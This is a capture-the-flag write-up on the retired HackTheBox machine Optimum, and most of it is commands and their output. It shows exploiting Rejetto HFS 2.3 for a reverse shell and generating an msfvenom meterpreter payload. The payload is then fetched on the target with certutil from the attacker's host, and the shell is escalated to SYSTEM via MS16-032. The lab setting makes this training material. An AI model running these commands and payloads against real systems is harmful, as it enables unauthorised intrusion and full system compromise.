This is a retired machine of HackTheBox.
It’s rated as being quite easy, try it for yourself now! Come back only if you feel stuck 🙂.
Let’s begin!
Table of Contents
- Port Scanning
- Searching for vulnerabilities
- Getting a shell
- Upgrading shell to meterpreter
- Privilege escalation
Port Scanning
Let’s start checking which ports are open, with the help of nmap:
kali@kali ~/H/Optimum> sudo nmap -p- -T4 -A -oN nmap.results 10.10.10.8 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-15 13:16 EDT Nmap scan report for 10.10.10.8 Host is up (0.046s latency). Not shown: 65534 filtered ports PORT STATE SERVICE VERSION 80/tcp open http HttpFileServer httpd 2.3 |_http-server-header: HFS 2.3 |_http-title: HFS / Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Microsoft Windows Server 2012 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
I guess there’s not much to say here 😛
Searching for vulnerabilities
When I see a service version, I immediately query searchsploit to find exploits for it. (most often even before googling)
kali@kali ~/H/Optimum> searchsploit HttpFileServer 2.3 Exploits: No Results Shellcodes: No Results
No luck…
But wait! Sometimes the exploits can have a different naming, for instance, referencing only the initials of the service, let’s try like this:
kali@kali ~/H/Optimum> searchsploit HFS 2.3 HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC) | multiple/remote/48569.py Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload | multiple/remote/30850.txt Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1) | windows/remote/34668.txt Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) | windows/remote/39161.py Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution | windows/webapps/34852.txt
Looks like we have a lot of options here.
Note though that if you google for an exploit, you can easily find one that is already built in Metasploit, however let’s go with the slightly harder route.
Getting a shell
I chose the second-last exploit, because it’s Python so we can run it.
To copy the exploit, type this:
kali@kali ~/H/Optimum> searchsploit -m windows/remote/39161.py Exploit: Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) URL: https://www.exploit-db.com/exploits/39161 Path: /usr/share/exploitdb/exploits/windows/remote/39161.py File Type: Python script, ASCII text executable, with very long lines, with CRLF line terminators Copied to: /home/kali/HackTheBox/Optimum/39161.py
Now, after reading its source, you can see that it requires you to change your ip and port:
After changing it, remember to start a netcat before running the exploit.
kali@kali ~/H/Optimum> nc -vlp 9090 listening on [any] 9090 …
Oh and I hope you have read the exploit’s description, because it asks you to host a webserver to serve netcat!
kali@kali ~/H/O/http> wget https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip --2020-08-15 13:54:36-- https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip Resolving eternallybored.org (eternallybored.org)… 84.255.206.8, 2a01:260:4094:1:42:42:42:42 Connecting to eternallybored.org (eternallybored.org)|84.255.206.8|:443… connected. HTTP request sent, awaiting response… 200 OK Length: 109604 (107K) [application/zip] Saving to: ‘netcat-win32-1.11.zip’ netcat-win32-1.11.zip 100%[=======================================================>] 107.04K 585KB/s in 0.2s 2020-08-15 13:54:37 (585 KB/s) - ‘netcat-win32-1.11.zip’ saved [109604/109604] kali@kali ~/H/O/http> unzip netcat-win32-1.11.zip Archive: netcat-win32-1.11.zip inflating: netcat-1.11/doexec.c inflating: netcat-1.11/generic.h inflating: netcat-1.11/getopt.c inflating: netcat-1.11/getopt.h inflating: netcat-1.11/hobbit.txt inflating: netcat-1.11/license.txt inflating: netcat-1.11/Makefile inflating: netcat-1.11/nc.exe inflating: netcat-1.11/nc64.exe inflating: netcat-1.11/netcat.c inflating: netcat-1.11/readme.txt kali@kali ~/H/O/http> cd netcat-1.11/
Now it’s time to serve it to the exploit, for that we’ll use the http.server module of Python3:
kali@kali ~/H/O/h/netcat-1.11> sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) …
Note: If you don’t modify the exploit, you must use port 80, and for that you need to sudo
Time to (finally) run the script!
kali@kali ~/H/Optimum> python 39161.py 10.10.10.8 80
(assuming you have read the usage part of the script :P)
Then in the netcat:
kali@kali ~/H/Optimum [1]> nc -vlp 9090 listening on [any] 9090 … 10.10.10.8: inverse host lookup failed: Unknown host connect to [10.10.14.30] from (UNKNOWN) [10.10.10.8] 49171 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Users\kostas\Desktop>whoami whoami optimum\kostas C:\Users\kostas\Desktop>
Upgrading shell to meterpreter
In Windows machines, I always like to upgrade the shell to a meterpreter (it’s way easier to priv esc that way).
Let’s try it, but first, let’s check what architecture the windows is in:
C:\Users\kostas\Desktop>systeminfo systeminfo Host Name: OPTIMUM OS Name: Microsoft Windows Server 2012 R2 Standard OS Version: 6.3.9600 N/A Build 9600 ... System Model: VMware Virtual Platform System Type: x64-based PC
It’s x64, now we need to generate a x64 meterpreter payload that will get us the reverse meterpreter shell:
kali@kali ~/H/O/http> msfvenom -f exe -o payload.exe -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.25 LPORT=4040
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 201283 bytes
Final size of exe file: 207872 bytes
Saved as: payload.exe
kali@kali ~/H/O/http>
That command will generate an exe file, of the payload type meterpreter_reverse_tcp for x64 Windows with my IP and an arbitrary Port
The second step is setting up the handler/listener for it:
kali@kali ~/H/Optimum> msfconsole -q msf5 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp
It gave us a default payload, let’s specify the one we want.
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp payload => windows/x64/meterpreter_reverse_tcp
Now the LHOST and LPORT (ours, the same ones we specified in msfvenom):
msf5 exploit(multi/handler) > set LHOST 10.10.14.30
LHOST => 10.10.14.30
msf5 exploit(multi/handler) > set LPORT 4040
LPORT => 4040
Then start it.
msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 10.10.14.30:4040
As for the third step, all that’s left to do is getting it into the target and executing it.
Like we did for the netcat, we’ll now serve the http server for the payload.exe.
kali@kali ~/H/O/http> sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) …
Now on the target (hopefully your shell hasn’t died yet), we’ll use certutil.exe to download the payload from our machine.
C:\Users\kostas\Desktop>certutil.exe -urlcache -split -f "http://10.10.14.30/payload.exe" payload.exe
certutil.exe -urlcache -split -f "http://10.10.14.30/payload.exe" payload.exe
**** Online ****
000000 …
032c00
CertUtil: -URLCache command completed successfully.
It downloaded successfully, we can check that also on our python output:
kali@kali ~/H/O/http> sudo python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) … 10.10.10.8 - - [15/Aug/2020 18:45:01] "GET /payload.exe HTTP/1.1" 200 - 10.10.10.8 - - [15/Aug/2020 18:45:01] "GET /payload.exe HTTP/1.1" 200 -
Let’s execute it!
C:\Users\kostas\Desktop>.\payload.exe
.\payload.exe
Your msfconsole should now light up.
[] Started reverse TCP handler on 10.10.14.30:4040 [] Meterpreter session 1 opened (10.10.14.30:4040 -> 10.10.10.8:49186) at 2020-08-15 18:47:26 -0400 meterpreter > getuid Server username: OPTIMUM\kostas
Privilege escalation
Time to get to the root of it.
It’s always a good idea to try the script kiddie’s friend:
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
Well, it didn’t hurt to try.
Let’s search for priv esc exploits for this Windows version (that we had noticed before).
The title is
Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) – Local Privilege Escalation (MS16-032) (PowerShell)
We can check that vulnerability ID in metasploit to see if there’s already a module for that.
msf5 exploit(multi/handler) > search MS16-032 ... 0 exploit/windows/local/ms16_032_secondary_logon_handle_privesc 2016-03-21 normal Yes MS16-032 Secondary Logon Handle Privilege Escalation
And it looks like we’re golden!
Let’s give it a go.
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST 10.10.14.30 LHOST => 10.10.14.30 msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LPORT 5050 LPORT => 5050 msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set SESSION 1 SESSION => 1 msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > exploit [*] Started reverse TCP handler on 10.10.14.30:5050 [+] Compressed size: 1016 [!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell [*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\RSKjjO.ps1… [*] Compressing script contents… [+] Compressed size: 3592 [*] Executing exploit script… ... [!] Holy handle leak Batman, we have a SYSTEM shell!! UPU6QGcJqNltAv0NTRCUVZ3MEdCGZC1P [+] Executed on target machine. [*] Sending stage (176195 bytes) to 10.10.10.8 [*] Meterpreter session 2 opened (10.10.14.30:5050 -> 10.10.10.8:49187) at 2020-08-15 19:00:17 -0400 [+] Deleted C:\Users\kostas\AppData\Local\Temp\RSKjjO.ps1 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter >
And we’re done!
DavidSec 